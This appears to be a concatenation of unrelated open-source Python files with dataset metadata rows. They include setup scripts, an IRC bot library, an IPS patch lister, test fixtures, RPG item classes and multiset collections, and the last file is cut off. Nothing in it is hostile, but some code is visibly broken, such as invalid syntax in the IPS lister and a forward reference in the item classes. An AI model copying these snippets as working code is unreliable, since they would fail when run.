msg["is_observed"] = False
return self._pyro_sample(msg)
|
apache-2.0
| -165,752,808,491,558,800 | 37.824 | 91 | 0.553678 | false |
google-research/google-research
|
jax2tex/setup.py
|
1
|
2521
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Setup the package with pip."""
import os
import sys
import setuptools
# https://packaging.python.org/guides/making-a-pypi-friendly-readme/
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
INSTALL_REQUIRES = [
'jax', 'jaxlib'
]
def _get_version() -> str:
"""Returns the package version.
Adapted from:
https://github.com/deepmind/dm-haiku/blob/d4807e77b0b03c41467e24a247bed9d1897d336c/setup.py#L22
Returns:
Version number.
"""
path = '__init__.py'
version = '__version__'
with open(path) as fp:
for line in fp:
if line.startswith(version):
g = {}
exec(line, g) # pylint: disable=exec-used
return g[version] # pytype: disable=key-error
raise ValueError(f'`{version}` not defined in `{path}`.')
setuptools.setup(
name='jax2tex',
version=_get_version(),
license='Apache 2.0',
author='Google',
author_email='schsam@google.com',
install_requires=INSTALL_REQUIRES,
long_description=long_description,
long_description_content_type='text/markdown',
description='Convert jax functions to latex output.',
python_requires='>=3.6')
|
apache-2.0
| -6,288,696,118,159,902,000 | 30.123457 | 97 | 0.689409 | false |
s4w3d0ff/stirbot
|
stirbot/__init__.py
|
1
|
19959
|
#!/usr/bin/python
import time
import re
import logging
import socket
import ssl
from logging.handlers import RotatingFileHandler
from multiprocessing.dummy import Pool, Process
from multiprocessing import cpu_count
SSLPORTS = [6697, 7000, 7070]
NONSSLPORTS = [6665, 6666, 6667, 8000, 8001, 8002]
class CommandHandle(object):
""" Base Class for commands """
def __init__(self, regex, function):
if not isinstance(regex, list):
regex = [regex]
self.regex = regex
self.function = function
self.cregex = []
class Channel(object):
""" Base class for channels"""
def __init__(self):
self.users = {}
#{'name': 'ACC level'},
self.ops = []
self.voices = []
self.modes = []
self.topic = ""
class IRCServer(object):
""" Manages Irc server connection """
def __init__(
self, nick, host="chat.freenode.net",
autojoin=['#stirbot'], ssl=False, timeout=60*4,
threads=cpu_count()**3, pswrd=False
):
self.nick, self.host, self.pswrd = nick, host, pswrd
self.ssl, self.threads = ssl, threads
if not self.ssl:
self.port = 6666
else:
self.port = 7070
self.timeout, self.threads = timeout, threads
self._listenThread = self._sock = None
self._connected = self._running = self._authed = False
self.channels, self.joinChans = {}, autojoin
self.commands = {}
self._pool = Pool(int(self.threads))
self._listenPool = Pool(int(self.threads))
self.nickserv = 'NickServ!NickServ@services.'
self.servHost = None
#-------------------------------------------------------------------------------
self._serverRe = {
'_002': CommandHandle(r'^:(.*) 002 (.*) :.*', self._got002),
'_Ping': CommandHandle(r'^PING :(.*)', self._pong),
'_Sniff': CommandHandle(
[
r'^:(.*)!(.*) PRIVMSG (.*) :(.*)',
r'^:(.*)!(.*) NOTICE (.*) :(.*)'
],
self._sniffMessage
),
'_332': CommandHandle(
[
r'^:(.*) 332 %s (.*) :(.*)' % self.nick,
r'^:(.*) TOPIC (.*) :(.*)'
],
self._updateTopic
),
'_353': CommandHandle(
r'^:.* 353 %s . (.*) :(.*)' % self.nick,
self._updateNames
),
'_Quit': CommandHandle(
r'^:(.*)!.* QUIT :', self._somebodyQuit
),
'_Modeset': CommandHandle(
r'^:.* MODE (.*) \+([A-Za-z]) (.*)', self._modeSet
),
'_Modeunset': CommandHandle(
r'^:.* MODE (.*) -([A-Za-z]) (.*)', self._modeUnset
),
'_Join': CommandHandle(
r'^:(.*)!.* JOIN (.*)', self._joinedUser
),
'_Part': CommandHandle(
r'^:(.*)!.* PART (.*) :.*', self._removeUser
),
'_ACC': CommandHandle(
r'^:(.+) NOTICE %s :(.+) ACC (\d)(.*)?' % self.nick,
self._updateACC
),
'_Identify': CommandHandle(
r'^:(.+) NOTICE (.+) :You are now identified for',
self._identified
)
}
def _got002(self, match):
""" Fills Serverhost name attribute"""
if match.group(2) == self.nick:
self.servHost = match.group(1)
logging.info("Our server host is: %s" % self.servHost)
def _pong(self, match):
""" Pong the Ping """
logging.debug(match.group(0))
if match.group(1) == self.servHost:
self._send("PONG :%s" % self.servHost)
def _identified(self, match):
""" Tells the bot it is authenticated with Nickserv """
logging.debug(match.group(0))
if match.group(1) == self.nickserv and match.group(2) == self.nick:
self._authed = True
logging.info('%s is authenticated with Nickserv!' % self.nick)
def _joinedUser(self, match):
""" Fires when a user joins a channel """
logging.debug(match.group(0))
nick, channel = match.group(1), match.group(2)
if channel not in self.channels:
self.channels[channel] = Channel()
self.channels[channel].users[nick] = 0
logging.info('%s joined %s' % (nick, channel))
def _somebodyQuit(self, match):
""" Fires when a user quits """
logging.debug(match.group(0))
nick = match.group(1)
# if it is us quiting
if nick == self.nick:
self.disconnect()
else:
for channel in self.channels:
if nick in self.channels[channel].users:
del self.channels[channel].users[nick]
if nick in self.channels[channel].ops:
del self.channels[channel].ops[nick]
if nick in self.channels[channel].voices:
del self.channels[channel].voices[nick]
logging.info('%s quit!' % nick)
def _removeUser(self, match):
""" Removes a user from a channel """
logging.debug(match.group(0))
nick, channel = match.group(1), match.group(2)
if nick is self.nick:
del self.channels[channel]
else:
del self.channels[channel].users[nick]
if nick in self.channels[channel].ops:
del self.channels[channel].ops[nick]
if nick in self.channels[channel].voices:
del self.channels[channel].voices[nick]
logging.info('%s parted %s' % (nick, channel))
logging.debug(self.channels[channel].users)
def _updateTopic(self, match):
""" Update the topic for a channel """
logging.debug(match.group(0))
host, channel, topic = match.group(1), match.group(2), match.group(3)
if channel not in self.channels:
self.channels[channel] = Channel()
self.channels[channel].topic = topic
logging.info('[%s] TOPIC: %s' % (channel, self.channels[channel].topic))
def _updateNames(self, match):
""" Takes names from a 353 and populates the channels users """
logging.debug(match.group(0))
channel, names = match.group(1), match.group(2).split(' ')
if channel not in self.channels:
self.channels[channel] = Channel()
for name in names:
if name[0] == '@':
name = name[1:]
if name not in self.channels[channel].ops:
self.channels[channel].ops.append(name)
if name[0] == '+':
name = name[1:]
if name not in self.channels[channel].voices:
self.channels[channel].voices.append(name)
if name not in self.channels[channel].users:
self.channels[channel].users[name] = 0
logging.info('[%s] USERS: %s' % (
channel, str(self.channels[channel].users)
))
logging.info('[%s] OPS: %s' % (
channel, str(self.channels[channel].ops)
))
logging.info('[%s] VOICES: %s' % (
channel, str(self.channels[channel].voices)
))
def _updateACC(self, match):
""" Updates an users ACC level """
logging.debug(match.group(0))
nick, acc = match.group(2), match.group(3)
if match.group(1) == self.nickserv:
for channel in self.channels:
self.channels[channel].users[nick] = acc
logging.info('ACC: %s [%d]' % (nick, acc))
def _modeSet(self, match):
""" Adds mode flags to a user in the CHANNELS dict """
logging.debug(match.group(0))
channel, mode, nick = match.group(1), match.group(2), match.group(3)
if 'o' in mode or 'O' in mode:
if nick not in self.channels[channel].ops:
self.channels[channel].ops.append(nick)
if 'v' in mode or 'V' in mode:
if nick not in self.channels[channel].voices:
self.channels[channel].voices.append(nick)
logging.debug('OPS: %s' % str(self.channels[channel].ops))
logging.debug('VOICES: %s' % str(self.channels[channel].voices))
def _modeUnset(self, match):
""" Removes mode flags from a user in the CHANNELS dict """
logging.debug(match.group(0))
channel, mode, nick = match.group(1), match.group(2), match.group(3)
if 'o' in mode or 'O' in mode:
try:
self.channels[channel].ops.remove(nick)
except Exception as e:
logging.exception(e)
if 'v' in mode or 'V' in mode:
try:
self.channels[channel].voices.remove(nick)
except Exception as e:
logging.exception(e)
logging.debug('OPS: %s' % str(self.channels[channel].ops))
logging.debug('VOICES: %s' % str(self.channels[channel].voices))
#-------------------------------------------------------------------------------
def sendMessage(self, target, message):
""" Send a message """
self._send("PRIVMSG %s :%s" % (target, message))
def sendNotice(self, target, message):
""" Send a notice """
self._send("NOTICE %s :%s" % (target, message))
def checkACC(self, nick):
""" Check the acc level of a nick """
self._send("NICKSERV ACC %s" % nick)
def joinChannel(self, channel):
""" Join a channel """
self._send("JOIN %s" % channel)
def partChannel(self, channel):
""" Leave a channel """
self._send("PART %s" % channel)
def setNick(self, nick):
""" Change nickname """
self.nick = nick
self.compileRe()
self._send("NICK %s" % nick)
logging.info('Nick changed!')
def setChannelTopic(self, channel, topic):
""" Change channel topic """
self._send("TOPIC %s :%s" % (channel, topic))
def kickUser(self, channel, nick, message):
""" Kick a user """
self._send("KICK %s %s :%s" % (channel, nick, message))
def quit(self, message="I'll be back!"):
""" Send quit message """
self._send("QUIT :%s" % message)
#-------------------------------------------------------------------------------
def loadCommands(self, commands):
"""
Loads a dict as self.commands and compiles regex (overwrites all)
"""
logging.info('Loading commands')
self.commands = commands
self._pool.map(self._compileCommandRe, self.commands)
def addCommand(self, name, regex, func):
"""
Add a command to the self.commands dict
(overwrites commands with the same <name>)
"""
self.commands[name] = CommandHandle(regex, func)
self._compileCommandRe(name)
logging.info('Command: %s added!' % name)
def removeCommand(self, name):
""" Remove <name> command from the self.commands dict """
del self.commands[name]
logging.info('Command: %s removed!' % name)
#-------------------------------------------------------------------------------
def _compileServerRe(self, command):
""" Compiles single server regex by command name """
self._serverRe[command].cregex = []
logging.debug(self._serverRe[command].regex)
for item in self._serverRe[command].regex:
self._serverRe[command].cregex.append(re.compile(item))
def _compileCommandRe(self, command):
""" Compiles single command regex by command name """
self.commands[command].cregex = []
logging.debug(self.commands[command].regex)
for item in self.commands[command].regex:
self.commands[command].cregex.append(re.compile(item))
def compileRe(self):
""" Uses the thread pool to compile all the commands regex """
logging.info('Compiling regex!')
self._pool.map(self._compileServerRe, self._serverRe)
self._pool.map(self._compileCommandRe, self.commands)
def _autoJoin(self):
""" Join all the channels in self.autojoin """
for chan in self.joinChans:
logging.info('Auto joining: %s' % chan)
self.joinChannel(chan)
#-------------------------------------------------------------------------------
def _sniffLine(self, line):
"""
Searches the line for anything relevent
executes the function for the match
"""
match = False
for name in self._serverRe:
for item in self._serverRe[name].cregex:
match = item.search(line)
if match:
self._serverRe[name].function(match)
return True
def _sniffMessage(self, match):
"""
Search PRIVMESG/NOTICE for a command
executes the function for the match
"""
nick, host, chan, message = \
match.group(1), match.group(2), match.group(3), match.group(4)
cmatch = False
logging.info('[%s] %s: %s' % (chan, nick, message))
for name in self.commands:
for regex in self.commands[name].cregex:
cmatch = regex.search(message)
if cmatch:
self.commands[name].function(chan, nick, host, cmatch)
return True
#-------------------------------------------------------------------------------
def _identifyNick(self, pswrd):
""" Identify bot nickname with nickserv """
self._send("NICKSERV IDENTIFY %s" % (pswrd))
def auth(self, nick):
""" Login to the IRC server and identify with nickserv"""
logging.info('Authenticating bot with server...')
self._send(
"USER %s %s %s :This bot is a result of open-source development." %\
(nick, nick, nick)
)
self._send("NICK %s" % nick)
if self.pswrd:
logging.debug('We have a nick password!')
self._identifyNick(self.pswrd)
logging.info('Waiting on Nickserv...')
count = 0
while not self._authed:
time.sleep(5)
count += 1
if count > 5:
raise RuntimeError('Failed to auth with Nickserv')
else:
self._authed = True
def _send(self, message):
""" Sends a message to IRC server """
logging.debug("> %s" % message)
message = "%s\r\n" % message
try:
self._sock.send(message.encode("utf-8"))
except (socket.timeout, socket.error, ssl.SSLError) as e:
logging.warning("Socket Error: Could not send!")
logging.exception(e)
self._connected = False
except Exception as e:
logging.exception(e)
self._connected, self._running = False, False
def _listen(self):
""" This should be running in a thread """
logging.info('Listening...')
while self._connected:
try:
data = self._sock.recv(4096)
except (socket.timeout, ssl.SSLError) as e:
if 'timed out' in e.args[0]:
continue
else:
logging.exception(e)
self._connected = False
continue
except socket.error as e:
logging.exception(e)
self._connected = False
continue
else:
if len(data) == 0:
logging.warn('Listen socket closed!')
self._connected = False
continue
try:
data = data.strip(b'\r\n').decode("utf-8")
self._listenPool.map(self._sniffLine, data.splitlines())
except Exception as e:
logging.exception(e)
continue
self._listenPool.join()
logging.info('No longer listening...')
def connect(self):
"""Connect the socket to the server and listen"""
while not self._connected:
logging.info("Connecting to %s:%s" % (self.host, str(self.port)))
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(2)
if not self._sock.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE):
logging.debug('Keeping socket alive')
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if self.ssl:
self._sock = ssl.wrap_socket(self._sock)
try:
self._sock.connect((self.host, self.port))
except (socket.timeout, socket.error, ssl.SSLError) as e:
logging.exception(e)
time.sleep(1.0)
continue
except Exception as e:
logging.exception(e)
self._connected, self._running = False, False
else:
logging.info("Connected!")
self._connected = True
def disconnect(self):
""" Disconnect from the server """
logging.info('Disconnecting...')
self._connected, self._running, self._authed = False, False, False
self.servHost, self.channels = None, {}
try:
self._pool.close()
self._listenPool.close()
except Exception as e:
logging.exception(e)
logging.debug('Pool closed')
try:
self._pool.join()
except Exception as e:
logging.exception(e)
logging.debug('Pool joined')
self._pool = Pool(self.threads)
logging.debug('Pool cleared')
try:
self._listenThread.join()
except Exception as e:
logging.exception(e)
logging.debug('Listen Thread joined(?)')
try:
self._sock.close()
except Exception as e:
logging.exception(e)
logging.debug('Socket closed(?)')
logging.info('Disconnected!')
def __call__(self):
""" Starts the connection to the server """
self._running = True
while self._running:
self.compileRe()
self._listenThread = Process(name='Listener', target=self._listen)
self._listenThread.daemon = True
try:
self.connect()
self._listenThread.start()
self.auth(self.nick)
except:
self.disconnect()
continue
self._autoJoin()
while self._connected:
try:
time.sleep(0.5)
except:
self.disconnect()
if __name__ == "__main__":
logging.basicConfig(
format='[%(asctime)s] %(message)s',
datefmt="%m-%d %H:%M:%S",
level=logging.DEBUG
)
logger = logging.getLogger()
logger.addHandler(
RotatingFileHandler('ircbot.log', maxBytes=10**9, backupCount=5)
)
bot = IRCServer('s10tb0t', ssl=True)
def shutit(channel, nick, host, match):
bot.sendMessage(channel, '%s asked me to quit! See ya!' % nick)
bot._running = False
bot.quit()
bot.addCommand('Quit', r'^!quit', shutit)
bot()
|
gpl-3.0
| 6,888,434,177,947,593,000 | 37.680233 | 81 | 0.502831 | false |
superjamie/snippets
|
ips-ls.py
|
1
|
1502
|
#!/usr/bin/python
## lists contents of an IPS patch
## stole the processing from meunierd's python-ips
## License: MIT - https://opensource.org/licenses/MIT
from os.path import getsize,isfile
import struct
from sys import argv
def print_usage_and_exit():
print "Usage: {script} [IPS patch file]".format(script=argv[0])
exit(1)
def unpack_int(string):
"""Read an n-byte big-endian integer from a byte string."""
(ret,) = struct.unpack_from('>I', b'\x00' * (4 - len(string)) + string)
return ret
try:
patchpath = argv[1] and if (isfile(patchpath) == True):
patch_size = getsize(patchpath)
except:
print_usage_and_exit()
with open(patchpath, 'rb') as patchfile:
if patchfile.read(5) != b'PATCH':
raise Exception('Invalid patch header.')
# Read First Record
r = patchfile.read(3)
while patchfile.tell() not in [patch_size, patch_size - 3]:
# Unpack 3-byte pointers.
offset = unpack_int(r)
# Read size of data chunk
r = patchfile.read(2)
size = unpack_int(r)
if size == 0: # RLE Record
r = patchfile.read(2)
rle_size = unpack_int(r)
data = patchfile.read(1) * rle_size
else:
data = patchfile.read(size)
if offset >= 0:
# Write to file
print "Offset: {offset}".format(offset=hex(offset))
print "Data : {data}".format(data=repr(data))
# Read Next Record
r = patchfile.read(3)
|
gpl-2.0
| 3,190,011,513,683,501,000 | 29.653061 | 75 | 0.597204 | false |
anjel-ershova/python_training
|
fixture/application.py
|
1
|
1140
|
from selenium import webdriver
from fixture.session import SessionHelper
from fixture.fixture_group import GroupHelper
from fixture.navigation import NavigationHelper
from fixture.fixture_contact import *
class Application:
def __init__(self, browser, baseurl):
if browser == 'firefox':
self.wd = webdriver.Firefox()
elif browser == 'chrome':
self.wd = webdriver.Chrome()
elif browser == 'ie':
self.wd = webdriver.Ie()
self.wd.implicitly_wait(10)
elif browser == 'edge':
self.wd = webdriver.Edge()
else:
raise ValueError('Unrecognized browser %s' % browser)
self.session = SessionHelper(self)
self.contact = ContactHelper(self)
self.group = GroupHelper(self)
self.navigation = NavigationHelper(self)
self.baseurl = baseurl
# метод, проверяющий, валидна ли фикстура
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def destroy(self):
self.wd.quit()
|
apache-2.0
| 8,681,497,553,056,534,000 | 29.75 | 65 | 0.610659 | false |
bplower/legendary-waffle-lib
|
test/test_attribute_create.py
|
1
|
1029
|
#!/usr/bin/env python
"""
This tests the general database crud functions
"""
import os
import sys
import sqlalchemy
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import legendary_waffle
db_engine = sqlalchemy.create_engine("sqlite://")
legendary_waffle.models.MODELBASE.metadata.create_all(db_engine)
legendary_waffle.models.MODELBASE.metadata.bind = db_engine
db_session = sqlalchemy.orm.sessionmaker(bind=db_engine)
db = db_session()
print legendary_waffle.attribute_read(db)
legendary_waffle.model_create(db, legendary_waffle.models.Attribute, name = 'butts')
print legendary_waffle.attribute_read(db)
legendary_waffle.model_update(db, legendary_waffle.models.Attribute, 1, name = 'poop')
print legendary_waffle.model_read(db, legendary_waffle.models.Attribute)
print legendary_waffle.model_read(db, legendary_waffle.models.Attribute, 1)
legendary_waffle.model_delete(db, legendary_waffle.models.Attribute, 1)
print legendary_waffle.model_read(db, legendary_waffle.models.Attribute)
|
apache-2.0
| -5,286,218,143,307,776,000 | 35.75 | 86 | 0.785228 | false |
grantcolasurdo/geras
|
age/items.py
|
1
|
10048
|
"""This is a repository for items in AGE"""
import csv
__author__ = "Grant Colasurdo"
class Items:
"""This class manages the meta-info of """
def __init__(self, character):
self.character = character
class Item:
def __init__(self, csv_row):
self.item_name: str = csv_row['item_name']
self.weight: float = csv_row['weight']
self.size: float = csv_row['size']
self.value: float = csv_row['value']
self.hands_to_wield: int = csv_row['hands_to_wield']
class Wear:
"""Handle the meta data for clothing worn by a character
Notes
-----
Attributes link to places that clothes can be worn. Some positions have 3 layers represented by placement on a list.
[Under, Normal, Over]
"""
def __init__(self, character):
self.character = character
self.armor: WearLocation = WearLocation(self, "Armor", (False, False, True))
self.feet: WearLocation = WearLocation(self, "Feet", (True, True, True))
self.legs: WearLocation = WearLocation(self, "Legs", (True, True, True))
self.waist: WearLocation = WearLocation(self, "Waist", (False, True, False))
self.torso: WearLocation = WearLocation(self, "Torso", (True, True, True))
self.head: WearLocation = WearLocation(self, "Head", (False, True, True))
self.face: WearLocation = WearLocation(self, "Face", (False, True, False))
self.hands: WearLocation = WearLocation(self, "Hands", (False, True, False))
self.back: WearLocation = WearLocation(self, "Back", (False, True, False))
self.location_list = {'armor', 'feet', 'legs', 'waist', 'torso', 'head', 'face', 'hands', 'back'}
@property
def worn_weight(self):
return sum({self.__dict__[location].weight for location in self.location_list})
class WearSlot:
"""Each wear slot can hold 1 clothing or armor item"""
def __init__(self, wear_location: WearLocation):
self.wear_slot = wear_location
self.item = None # The normal spot for most clothing
self.enabled = False # If the slot is disabled, then no items will not be assignable
@property
def item(self):
return self.item
@item.setter
def item(self, value: Item):
if self.enabled:
self.item = value
else:
print("This equipment slot is disabled")
@property
def weight(self) -> int:
if self.item is None:
return 0
else:
return self.item.weight
class WearLocation:
"""A position on the body that can be equipped with wearable"""
def __init__(self, wear: Wear, location_name, enabled_slots):
self.wear_root = wear
self.location_name = location_name
self.under_slot = WearSlot(self)
self.middle_slot = WearSlot(self)
self.over_slot = WearSlot(self)
self.under_slot.enabled = enabled_slots[0]
self.middle_slot.enabled = enabled_slots[1]
self.over_slot.enabled = enabled_slots[2]
@property
def weight(self):
return sum({self.over_slot.weight, self.middle_slot.weight, self.over_slot.weight})
class Currency(Item):
def __init__(self, csv_row):
super().__init__(csv_row)
class Container(Item):
def __init__(self, csv_row):
super(Container, self).__init__(csv_row)
self._weight = None
self.items = set()
self.volume_capacity = csv_row['volume_capacity']
self.weight_capacity = csv_row['weight_capacity']
self.lock = None
@property
def weight(self) -> float:
contained_weight = sum([item.weight for item in self.items])
return contained_weight + self.self_weight
@weight.setter
def weight(self, value: float):
self._weight = value
@property
def self_weight(self) -> float:
return self._weight
@self_weight.setter
def self_weight(self, value: float):
self._weight = value
@property
def remaining_weight(self):
return self.weight_capacity - self.weight
@property
def occupied_space(self):
return sum([item.size for item in self.items])
@property
def remaining_space(self):
return self.volume_capacity - self.occupied_space
def insert(self, item: Item):
try:
assert self.remaining_space >= item.size
self.items.add(item)
except AssertionError:
print("There is not enough space or spare weight in the container to add")
def remove(self, item: Item):
try:
assert item in self.items
self.items.remove(item)
except AssertionError:
print("That item is not in the container")
class Weapon(Item):
def __init__(self, csv_row):
super().__init__(csv_row)
self.damage_rolls = csv_row['weapon_damage']
self.weapon_group = csv_row['weapon_group']
self.minimum_strength = csv_row['minimum_strength']
self.long_range = csv_row['short_range']
self.short_range = csv_row['maximum_range']
self.minimum_range = csv_row['minimum_range']
class Missile(Weapon):
def __init__(self, csv_row):
self.missile_used = None
super().__init__(csv_row)
class Armor(Item):
def __init__(self, csv_row):
self.rating = csv_row['armor_rating']
self.weight_class = csv_row['armor_weight_class']
self.penalty = csv_row['armor_penalty']
self.strain = csv_row['armor_strain']
super().__init__(csv_row)
class Shield(Item):
def __init__(self, csv_row):
self.weight_class = csv_row['armor_weight_class']
self.defense_modifier = csv_row['shield_bonus']
super().__init__(csv_row)
class Lock(Item):
def __init__(self, csv_row):
self.is_locked = None
super().__init__(csv_row)
class Tool(Item):
def __init__(self, csv_row):
super(Tool, self).__init__(csv_row)
class Traveling(Item):
def __init__(self, csv_row):
super(Traveling, self).__init__(csv_row)
class Clothing(Item):
def __init__(self, csv_row):
super(Clothing, self).__init__(csv_row)
class TradeGoods(Item):
def __init__(self, csv_row):
super(TradeGoods, self).__init__(csv_row)
class ProfessionalGear(Item):
def __init__(self, csv_row):
super(ProfessionalGear, self).__init__(csv_row)
class HomeAndHearth(Item):
def __init__(self, csv_row):
super(HomeAndHearth, self).__init__(csv_row)
class FoodAndLodging(Item):
def __init__(self, csv_row):
super(FoodAndLodging, self).__init__(csv_row)
class Equipment:
"""This will manage the meta level information for the items used in combat for a character"""
def __init__(self, character):
self.character = character
self.primary_hand = None # Link to an item that the primary hand is holding
self.secondary_hand = None # Link to an item that the secondary hand is holding
self._backpack = None # Link to an item that is worn on the character's back
@property
def armor_value(self) -> int:
"""The amount of protection your armor affords you"""
return self.character.wear.armor.over_slot.item.rating
@property
def armor_penalty(self) -> int:
"""The penalty applied to speed and Dexterity if untrained in the armor class"""
return self.armor.penalty
@property
def armor_strain(self):
"""The penalty applied to magic rolls"""
return self.character.wear.armor.over_slot.strain
@property
def armor(self) -> Armor:
"""Return the armor object being worn by the character"""
return self.character.wear.armor.over_slot.item
@armor.setter
def armor(self, value: Armor):
self.character.wear.armor.over_slot.item = value
@property
def shield_bonus(self):
"""Return the bonus to defense gained from having a shield"""
bonus_value = 0
try:
bonus_value = max(self.primary_hand.defense_modifier, bonus_value)
except AttributeError:
pass
try:
bonus_value = max(self.secondary_hand.defense_modifer, bonus_value)
except AttributeError:
pass
return bonus_value
@property
def backpack(self):
"""Return the backpack item worn by the character"""
return self.character.wear.back.middle_slot.item
@backpack.setter
def backpack(self, value: Container):
self.character.wear.back.middle_slot.item = value
ITEM_CLASS_DICT = {
"Currency": Currency,
"Container": Container,
"Item": Item,
"Lock": Lock,
"Tool": Tool,
"Missile": Missile,
"Traveling": Traveling,
"Clothing": Clothing,
"Trade Goods": TradeGoods,
"Professional Gear": ProfessionalGear,
"Home and Hearth": HomeAndHearth,
"Food and Lodging": FoodAndLodging,
"Weapon": Weapon,
"Armor": Armor,
"Shield": Shield
}
def new_item(item_name) -> Item:
item = None
with open('items.csv', 'r') as file:
item_db = csv.DictReader(file)
for row in item_db:
if row['item_name'] == item_name:
item_class = row['item_class']
class_to_call = ITEM_CLASS_DICT[item_class]
item = class_to_call(row)
return item
def init_items(character):
character = character
character.equipment = Equipment(character)
character.items = Items(character)
starting_items = set()
character.wear.back.middle_slot.item = new_item("Backpack")
character.wear.shirt.under_slot.item = new_item("Underclothes")
character.wear.feet.middle_slot.item = new_item("Boots")
character.wear.waist.middle_slot.item = new_item("Belt")
character.wear.legs.middle_slot.item = new_item("Pants")
character.wear.torso.middle_slot.item = new_item("Shirt")
character.wear.torso.over_slot.item = new_item("Jacket")
starting_items.add(new_item("Waterskin"))
|
gpl-2.0
| 4,637,744,781,462,521,000 | 29.916923 | 120 | 0.618631 | false |
maweki/more-collections
|
more_collections/multisets.py
|
1
|
5254
|
try: # Python compat < 3.3
from collections.abc import Set, MutableSet, Hashable, Iterable
except ImportError:
from collections import Set, MutableSet, Hashable, Iterable
from collections import defaultdict
from functools import reduce
from itertools import chain
import operator
try: # Python compat < 3.4
from functools import partialmethod
except ImportError:
from .common import partialmethod
class _base_multiset(Set):
def __init__(self, items=None):
self.__bag = {}
if isinstance(items, Iterable):
for i in items:
self.__bag[i] = self.__bag.get(i, 0) + 1
def __contains__(self, item):
return self.__bag.get(item, 0) > 0
def __len__(self):
return sum(self.__bag.values())
def __iter__(self):
for item in self.__bag:
for _ in range(self.__bag[item]):
yield item
def __le__(self, other):
if not isinstance(other, _base_multiset) or isinstance(other, _orderable_mixin):
raise NotImplementedError()
return all((self.count(i) <= other.count(i)) for i in self.__bag)
def __eq__(self, other):
if not isinstance(other, _base_multiset):
raise NotImplementedError()
return all((self.count(i) == other.count(i)) for i in chain(self.__bag, other.__bag))
def __lt__(self, other):
return (self <= other) and not (self == other)
def __gt__(self, other):
if not isinstance(other, _base_multiset):
raise NotImplementedError()
return other < self
def __ge__(self, other):
if not isinstance(other, _base_multiset):
raise NotImplementedError()
return other <= self
def __combine(self, amnt_op, this_op, other):
if isinstance(other, _base_multiset):
result = self.__class__()
for element in chain(self.__bag, other.__bag):
amount = amnt_op(self.count(element), other.count(element))
if amount > 0:
result.__bag[element] = amount
return result
if isinstance(other, Iterable):
return this_op(self, self.__class__(other))
raise NotImplementedError()
__sub__ = partialmethod(__combine, operator.sub, operator.sub)
__add__ = partialmethod(__combine, operator.add, operator.add)
__or__ = partialmethod(__combine, max, operator.or_)
__and__ = partialmethod(__combine, min, operator.and_)
__xor__ = partialmethod(__combine, lambda l, r: abs(l - r), operator.xor)
def count(self, item):
return self.__bag.get(item, 0)
def items(self):
return self.__bag.items()
class _orderable_mixin(object):
# Using the Dershowitz-Manna ordering that gives a well-founded ordering
# on multisets if the given carrier is ordered (strings, integers, etc.)
# This fails if the union of the sets that are compared has elements that
# are incomparible
# https://en.wikipedia.org/wiki/Dershowitz%E2%80%93Manna_ordering
def __le__(self, other):
if not (isinstance(other, _orderable_mixin)):
raise NotImplementedError()
# using definition by Huet and Oppen
M, N = self.count, other.count
S = frozenset(self | other)
ys = (y for y in S if M(y) > N(y))
return all(any((y < x and M(x) < N(x)) for x in S) for y in ys)
def __lt__(self, other):
if not (isinstance(other, _orderable_mixin)):
raise NotImplementedError()
return self != other and self <= other
def __gt__(self, other):
return not (self <= other)
def __ge__(self, other):
return not (self < other)
class multiset(_base_multiset, MutableSet):
def add(self, item):
self._base_multiset__bag[item] = self.count(item) + 1
def discard(self, item):
bag = self._base_multiset__bag
if item in bag:
bag[item] = bag[item] - 1
if bag[item] == 0:
del bag[item]
class frozenmultiset(_base_multiset, Hashable):
def __hash__(self):
from operator import xor
pots = (hash(key)**value for (key, value) in self.items())
return reduce(xor, pots, hash(())) ^ hash(self.__class__)
class orderable_multiset(_orderable_mixin, multiset):
pass
class orderable_frozenmultiset(_orderable_mixin, frozenmultiset):
pass
class nestable_orderable_frozenmultiset(orderable_frozenmultiset):
# Natural multiset extension for nested multisets over an orderable carrier
# again gives a well-founded total ordering
def __gt__(self, other):
if not isinstance(other, self.__class__):
return True
return super(self.__class__, self).__gt__(other)
def __ge__(self, other):
if not isinstance(other, self.__class__):
return True
return super(self.__class__, self).__ge__(other)
def __lt__(self, other):
if not isinstance(other, self.__class__):
return False
return super(self.__class__, self).__lt__(other)
def __le__(self, other):
if not isinstance(other, self.__class__):
return False
return super(self.__class__, self).__le__(other)
|
mit
| 8,331,213,310,677,032,000 | 33.116883 | 93 | 0.597069 | false |
dahlia/iterfzf
|
setup.py
|
1
|
12011
|
import distutils.core
import distutils.errors
import json
import os
import os.path
import platform
import re
import shutil
import sys
import tarfile
import tempfile
import warnings
import zipfile
try:
import urllib2
except ImportError:
from urllib import request as urllib2
from setuptools import setup
fzf_version = '0.20.0'
version = '0.5.' + fzf_version
release_url = ('https://api.github.com/repos/junegunn/fzf-bin/releases/tags/' +
fzf_version)
asset_filename_re = re.compile(
r'^fzf-(?P<ver>\d+\.\d+\.\d+)-'
r'(?P<plat>[^-]+)_(?P<arch>[^.]+)'
r'.(?P<ext>tgz|tar\.gz|tar\.bz2|zip)$'
)
fzf_bin_path = os.path.join(os.path.dirname(__file__), 'iterfzf', 'fzf')
fzf_windows_bin_path = os.path.join(os.path.dirname(__file__),
'iterfzf', 'fzf.exe')
urllib_retry = 3
def readme():
